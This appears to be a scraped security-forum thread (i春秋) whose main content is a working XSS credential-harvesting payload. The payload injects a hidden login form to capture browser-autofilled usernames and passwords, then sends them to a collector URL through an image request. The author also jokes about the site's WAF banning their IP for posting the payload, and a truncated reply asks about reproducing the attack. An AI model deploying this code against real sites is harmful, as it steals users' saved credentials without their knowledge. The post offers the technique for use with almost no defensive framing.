发帖
该用户从未签到
i春秋作家
8
40
325
<script type="text/javascript"> document.write("<div></div>") var form_1 = document.createElement("form"); form_1.id = 'f_id'; document.getElementsByTagName('div')[0].appendChild(form_1); document.getElementById('f_id').style.display='none'; var name_1 = document.createElement("input"); var pass_1 = document.createElement("input"); name_1.type = "text"; name_1.name = "username"; name_1.id = "username" pass_1.type = "password"; pass_1.name = "password"; pass_1.id = "password"; form_1.appendChild(name_1); form_1.appendChild(pass_1); </script>
一发xss payload 就被ichunqiu的waf,ban ip ,你们自己懂XSS如何构造吧?手动狗头!
setTimeout(function () { username = document.getElementById('login_username').value; password = document.getElementById('login_password').value; if (username.length > 0) { var newimg = new Image(); newimg.src = 'http://127.0.0.1:8081/?username=' + username + '&password=' + password; } }, 2000);
熊哥 发表于 2020-6-8 16:51 感谢作者大大的分享,刚刚我闲来没事自己复现了一下,有几个问题想请教一下您。 1、此方法貌似只能攻击浏览 ...
只有在社区发布原创文章才能获得哦